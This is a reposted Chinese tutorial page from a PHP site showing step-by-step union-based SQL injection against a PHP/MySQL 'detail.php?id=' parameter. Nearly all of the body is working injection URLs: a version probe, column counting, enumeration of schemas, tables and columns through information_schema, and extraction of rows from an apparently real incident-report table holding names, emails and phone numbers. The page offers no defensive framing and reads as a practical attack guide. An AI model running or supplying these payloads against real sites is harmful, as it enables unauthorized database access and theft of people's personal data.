Community Learn Tools Library Leisure
search
English
Home > Backend Development > PHP Tutorial > body text

php+mysql暴库语法

WBOY
Release: 2016-06-23 14:31:41
Original
1734 people have browsed it

1.判断版本http://www.xxx.xxx/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
2.猜解 字段数目,用order by也可以猜,也可以用union select一个一个的猜解
http://www.xxx.xxx/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
3.查看数据库版本及当前用户,http://www.xxx.xxx/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
数据库版本 5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
4.判断有没有写权限
http://www.xxx.xxx/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
没办法,手动猜 表啦

5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手 法,不多说,如下
http://www.xxx.xxx/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
成 功查出所有数据库,国外的黑客就是不一般。数据库如下:
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
6. 爆表,爆的是twcert库
http://www.xxx.xxx/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
爆 出如下表
downloadfile,irsys,newsdata,secrpt,secrpt_big5
7.爆列名, 这次爆的是irsys表
http://www.xxx.xxx/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
爆 出如下列
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
8. 查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
http://www.xxx.xxx/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
返 回是3,说明每个列里有3个地段
9.爆字段内容
http://www.xxx.xxx/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
爆 出name列的第一个字段的内容
http://www.xxx.xxx/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
爆 出name列的第二个字段的内容
 

Related labels:
php+mysql暴库语法
source:php.cn
Previous article:PHP使用技巧 Next article:PHP版本解析
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Articles by Author
Latest Issues
function_exists() cannot determine the custom function Function test () {return true;} if (function_exists ('test')) {echo "test is function...
From 2024-04-29 11:01:01
0
2
1870
How to display the mobile version of Google Chrome Hello teacher, how can I change Google Chrome into a mobile version?
From 2024-04-23 00:22:19
0
10
2036
The child window operates the parent window, but the output does not respond. The first two sentences are executable, but the last sentence cannot be implemented.
From 2024-04-19 15:37:47
0
1
1713
There is no output in the parent window document.onclick = function(){ window.opener.document.write('I am the output of the child ...
From 2024-04-18 23:52:34
0
1
1614
Where is the courseware about CSS mind mapping? Courseware
From 2024-04-16 10:10:18
0
0
1627
Related Topics
More>
Popular Recommendations
Popular Tutorials
More>
Related Tutorials
Popular Recommendations
Latest courses
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template